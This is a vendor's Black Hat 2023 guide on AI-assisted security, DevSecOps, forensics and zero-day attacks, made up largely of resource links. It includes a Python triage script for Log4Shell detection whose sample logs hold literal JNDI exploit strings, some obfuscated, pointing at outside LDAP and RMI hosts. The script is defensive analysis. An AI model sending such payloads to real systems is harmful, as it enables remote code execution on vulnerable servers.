Black Hat 2023: Pairing causal AI and generative AI for cybersecurity threats

This year’s big-bang moment has been the surge in generative AI, such as ChatGPT. Generative AI can boost organizational productivity. Built on large language models (LLMs), it can help communication and creative teams run live chat between customer reps and consumers, generate product descriptions automatically and on the fly, or even detect fraud in financial services settings. Developers use generative AI to find errors in code and to document their code automatically. They can also use it to write prototype code, implement complex software systems, and support cybersecurity work.

But as the Black Hat 2023 agenda indicates, generative AI also introduces new security risks. According to the agenda, “AI’s capabilities can be a double-edged sword—a potent tool for both advancing the effectiveness of our existing security products and the emergence of more sophisticated threats.”

How will organizations and cybersecurity teams keep up with the “relentless pace of AI development,” as the keynote asks? Will generative AI multiply existing attack surfaces? And how can cybersecurity teams adjust to using generative AI to their advantage?

Pairing generative AI with causal AI

One key strategy is to pair generative AI with causal AI, providing organizations with better-quality data and answers as they make key decisions. Because generative AI is probabilistic, its value depends on the quality of the data used to train its models and to build its prompts. As a result, the power of generative AI can be amplified by causal AI and predictive intelligence.

“This combined approach provides reliable answers for two key purposes,” wrote Dynatrace CTO Bernd Greifeneder in a May 2023 blog post. “First, to drive trustworthy automation that is deterministic and repeatable through causal AI. Second, for causal AI to provide a deep and rich context to unleash GPT’s full potential for software delivery and productivity use cases.”

As cybersecurity teams look to identify malicious activity, the twin prongs of generative and causal AI provide a better foundation of quality data to identify and resolve security threats. These are just some of the themes we will explore in our guide for Black Hat 2023, which takes place August 5-10 in Las Vegas. Visit our booth, #2608, at Black Hat and check out our guide below.

AI for cybersecurity

Enterprises need a better solution for identifying security vulnerabilities that present the greatest risk. They also need an easy-to-digest way to prioritize which vulnerabilities to address first and those that pose less risk.

When security software incorporates AI—with predictive and historical investigation capabilities—security analysts can hunt for hidden threats with lightning-fast queries and use the resulting insights to automatically trigger a response to a security problem.

Security teams can create automations and workflows to assess the impact of an attack and find the indicators of compromise (IOCs). These precise answers and intelligent automations free security analysts from manual activities and enable them to focus on innovating.

Teams need a solution that can identify security risks and prioritize remediation steps. This vulnerability assessment can happen in real time with no manual effort. Check out the following resources to learn more.

Dynatrace Unveils Security Analytics, Providing Actionable Insights for Proactive Defense Against Threats to Cloud Applications – press release

Dynatrace® Security Analytics enables threat hunting and real-time detection and incident response.

TTP-based threat hunting with Dynatrace Security Analytics and Falco Alerts solves alert noise – blog

Security analysts are turning to AI and TTP-based threat-hunting techniques to uncover how attackers are trying to exploit their environments.

Dynatrace unveils Security Analytics to elevate threat detection, forensics, and incident response – blog

Dynatrace Security Analytics enables threat detection, forensics, and incident response using combined security and observability context across the full stack.

What is vulnerability management? And why runtime vulnerability detection makes the difference – blog

Vulnerability management is an essential part of securing IT operations. But managing the breadth of the vulnerabilities that can put your systems at risk is challenging.

Dynatrace Application Security automatically detects and blocks attacks in real time – blog

Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.

Dynatrace enhances application security with AI-powered vulnerability prioritization – press release

New Davis Security Advisor automatically contextualizes and prioritizes application vulnerabilities to reduce enterprise risk.

Observability for effective DevSecOps

Traditional approaches to application security can fail to keep up with the complexity of cloud-native environments and rapid software release cycles. As organizations hasten software development to remain competitive, security vulnerabilities can make their way into live applications because developers simply don’t have time to find and fix them. To address this, organizations are integrating DevOps and security, or “DevSecOps,” to detect and respond to software vulnerabilities in development and production faster and more efficiently.

To effectively advance DevSecOps maturity, teams can use observability data in context to take actions that strengthen defenses. Securing cloud-native applications at runtime combined with intelligent automation ensures that DevSecOps teams can address security concerns early in the software development lifecycle as well as in production. This approach helps organizations strengthen their application security so they can better protect users and the business from cyberattacks, including zero-day attacks and data breaches.

Learn more about securing modern applications and infrastructure and how to integrate security analytics into your DevSecOps initiative with the following resources.

Dynatrace Application Security automatically detects and blocks attacks in real time – blog

Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.

What is DevSecOps? And what you need to do it well – blog

DevSecOps connects three different disciplines: development, security, and operations. Learn how security improves DevOps.

Best practices for building a strong DevSecOps maturity model – blog

How can businesses effectively implement best practices to align with the evolving DevSecOps maturity model? Here’s what you need to know.

‘Security as code’ demands proactive DevSecOps – blog

Learn what “security as code” is, how to build a “security as code” culture, and why organizations must adopt a proactive DevSecOps stance.

DevSecOps automation improves application security in multicloud environments – blog

DevSecOps automation is essential for ensuring application security in multicloud environments. Learn how to automate DevSecOps at scale.

DevOps vs DevSecOps: Why integrate security and DevOps? – blog

Understand the difference between DevOps and DevSecOps. See how incorporating security practices into delivery workflows pays off.

Automated DevSecOps release validation ensures security by default – blog

In modern cloud-native environments, which rely on microservices architectures, application teams that are responsible for innovation face some dilemmas.

Cybersecurity analytics and observability in context for threat detection and response

Cybersecurity analytics and forensics are the practice of investigating security incidents, often based on log data, and an essential element of securing cloud-native applications and infrastructure. However, as more organizations adopt cloud-native environments, log data alone isn’t enough to surface critical evidence of exploitation activity.

Often, organizations aren’t even aware they’ve experienced a security attack. This lack of awareness means that organizations run the risk of bad actors repeatedly exploiting the same attack vector. The massive volumes of log data associated with a breach can make effective cybersecurity forensics complicated and costly. To speed detection and streamline remediation, organizations need detailed insight into security issues across their environments and applications.

As security teams seek to understand malicious events, the importance of unified observability in context compounds. Additionally, historical data about an incident is invaluable, enabling quick and precise answers about when the malicious activity occurred, when the vulnerability was first seen in the systems, what was attempted, and if the attackers were successful. Security analysts need to be able to respond to escalating cyber threats—such as the recent MOVEit vulnerability—as well as execute investigations and forensics fast, based on automation, observability context, and security data combined.

To learn more about leveraging observability and cybersecurity analytics to protect your organization from cyber threats, check out the following resources.

MOVEit vulnerability: Observability context fills log data gaps for MOVEit Transfer vulnerability – blog

MOVEit vulnerability investigations are exposing gaps in logs and payloads. But observability context can reveal hidden exploit evidence.

Log auditing and log forensics benefit from converging observability and security data – blog

Cloud complexity challenges log auditing and log forensics. Converging observability and security data provides real-time answers at scale.

Log forensics: Finding malicious activity in multicloud environments with Dynatrace Grail – blog

Log forensics is easy with Dynatrace Grail, the indexless, schema-on-read data lakehouse. This demo walks through how it works.

Dynatrace Application Security automatically detects and blocks attacks in real time – blog

Dynatrace has enhanced its Application Security Module to provide real-time, automatic attack detection and blocking.

Runtime vulnerability management is still a vexing challenge for organizations – blog

Runtime vulnerability management threats continue to hamper organizations as they release code faster. A new CISO report explains why.

Zero-day attacks

With organizations investing in their online presence, cyber attackers are taking advantage of organizations’ digitization. Attacks exploiting vulnerabilities such as Log4Shell and Spring4Shell are wreaking havoc on organizations, their sensitive data, and their software supply chains.

By definition, zero-day attacks take organizations by surprise. “Zero day” means bad actors discover and exploit a security vulnerability before the vendor and defenders know about it, so no patch exists yet. As a result, teams have “0 days” to remediate such issues and are always at risk. While IT teams can be diligent about identifying vulnerabilities, these weaknesses are difficult to detect. And even without a zero-day, attackers can almost always find another way in, using phishing scams, watering hole attacks, business email compromise, malicious sites, and other routes to unauthorized access.
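The forensic questions raised earlier in this guide (when was the malicious activity first seen, what was attempted, and did it succeed) can be answered for a Log4Shell-style attack with a small amount of log correlation. The following Python script is an added example written for this page; it is not code from the original guide and not a Dynatrace feature or query. It runs over constructed access-log and egress-log lines (log formats, hostnames and addresses are all assumptions), decodes URL-encoded and nested-lookup obfuscations of the JNDI payload, records the first attempt and its target, and treats an outbound connection from the application host to the payload’s host:port shortly after the request as evidence that the attempt succeeded.

```python
"""Triage of constructed access and egress logs for Log4Shell (CVE-2021-44228)
exploit attempts: when the first attempt appeared, what each attempt tried, and
whether the application host actually reached back out to the attacker's JNDI
server. Example code written for this guide, not a Dynatrace feature or query."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample data. Timestamps, hosts and addresses are fictional
# (RFC 5737 documentation ranges), chosen only to illustrate the correlation.
ACCESS_LOG = """\
2021-12-10T14:02:11Z 203.0.113.5 GET /login ua="${jndi:ldap://198.51.100.7:1389/a}" 200
2021-12-10T14:02:30Z 203.0.113.5 GET /login ua="%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D" 200
2021-12-10T14:05:00Z 198.51.100.22 GET /health ua="curl/7.79.1" 200
2021-12-10T14:06:45Z 192.0.2.9 GET /api ua="${${::-j}${::-n}${::-d}${::-i}:rmi://192.0.2.9:1099/x}" 500
"""

# Outbound connections observed from the application host (constructed).
EGRESS_LOG = """\
2021-12-10T14:02:12Z app-01 -> 198.51.100.7:1389 tcp ESTABLISHED
2021-12-10T14:10:00Z app-01 -> 10.0.0.5:5432 tcp ESTABLISHED
"""

ACCESS_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) ua="([^"]*)" (\d{3})$')
EGRESS_RE = re.compile(r"^(\S+) (\S+) -> (\S+) ")
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")  # a ${...} with no nested braces
JNDI_TARGET = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns|iiop)://([^/\s}]+)", re.I)


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def decode_lookups(value, max_rounds=32):
    """Undo URL-encoding, then collapse nested Log4j lookups such as ${lower:j},
    ${upper:I} or ${::-j} (default-value syntax) to the literal character they
    evaluate to, so an obfuscated payload reduces to a plain ${jndi:...} string.
    Case is normalized to lowercase because detection is case-insensitive."""
    s = unquote(value)
    for _ in range(max_rounds):
        m = INNER_LOOKUP.search(s)
        if not m or m.group(1).lower().startswith("jndi:"):
            break  # nothing left to collapse, or we reached the JNDI lookup itself
        body = m.group(1)
        if ":-" in body:                      # ${env:UNSET:-j} -> "j"
            literal = body.rsplit(":-", 1)[1]
        elif ":" in body:                     # ${lower:J} -> "j"
            literal = body.rsplit(":", 1)[1].lower()
        else:                                 # unknown lookup evaluates to nothing
            literal = ""
        s = s[: m.start()] + literal + s[m.end():]
    return s


def triage(access_log=ACCESS_LOG, egress_log=EGRESS_LOG, window=timedelta(seconds=60)):
    """Answer the three forensic questions: first attempt, what was attempted,
    and whether a callback to the attacker-controlled JNDI server followed."""
    egress = []
    for line in egress_log.splitlines():
        m = EGRESS_RE.match(line)
        if m:
            egress.append((parse_ts(m.group(1)), m.group(3)))

    attempts = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ts, src, _method, path, ua, _status = m.groups()
        decoded = decode_lookups(ua)
        t = JNDI_TARGET.search(decoded)
        if not t:
            continue
        when, target = parse_ts(ts), t.group(1)
        # Success evidence: the app host connected to the payload's host:port
        # within `window` after the request was logged.
        callback = any(dst == target and when <= ets <= when + window
                       for ets, dst in egress)
        attempts.append({"time": ts, "source": src, "path": path, "target": target,
                         "decoded": decoded, "callback_observed": callback})

    attempts.sort(key=lambda a: a["time"])  # ISO-8601 strings sort chronologically
    return {
        "first_seen": attempts[0]["time"] if attempts else None,
        "attempts": attempts,
        "confirmed_exploited": any(a["callback_observed"] for a in attempts),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

On the constructed data the first attempt is seen at 14:02:11, and the egress connection one second later to the same host:port named in the payload marks it as confirmed; the URL-encoded and `${::-j}`-style attempts are decoded to the same plain `${jndi:...}` form but have no matching callback, so they stay as attempts only. The callback correlation is the key caveat: a blocked or absent JNDI lookup string in the access log is not proof of safety, since the evidence of success lives in the host’s outbound connections, not in the request log.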

Check out these resources to learn more about these attacks and how you can protect your organization.

Protect your organization against zero-day vulnerabilities – blog

Zero-day vulnerabilities put organizations’ data at risk. Learn how to ward off these vulnerabilities to protect your data from zero-day attacks.

Why software supply chain attacks are increasing – blog

Myriad software supply chain attacks continue to plague the global flow of goods. Here’s how modern observability takes aim at cybersecurity risks.

3 DevSecOps practices to minimize the impact of the next Log4Shell – article

Important lessons from Log4Shell – a critical vulnerability that left much of the IT world vulnerable to zero-day attacks.

What is Log4Shell? The Log4j vulnerability explained (and what to do about it) – blog

The Log4j vulnerabilities have triggered millions of exploit attempts against the Log4j 2 library. Learn all you need to know about Log4Shell.

How Dynatrace uses Dynatrace to combat the Log4j vulnerability (Log4Shell) – blog

The Dynatrace security team explains how they used the Dynatrace platform to stay ahead of the Log4j vulnerability’s impact.

Log4Shell highlights the need for secure digital transformation – blog

Modern observability and vulnerability management gave Avisi the secure digital transformation strategy they needed to conquer Log4Shell.

Spring4Shell: Detect and mitigate new zero-day vulnerabilities in the Java Spring Framework – blog

Spring4Shell vulnerabilities expose Java Spring Framework apps to exploitation. Learn how to prevent its effects—and those of similar vulnerabilities.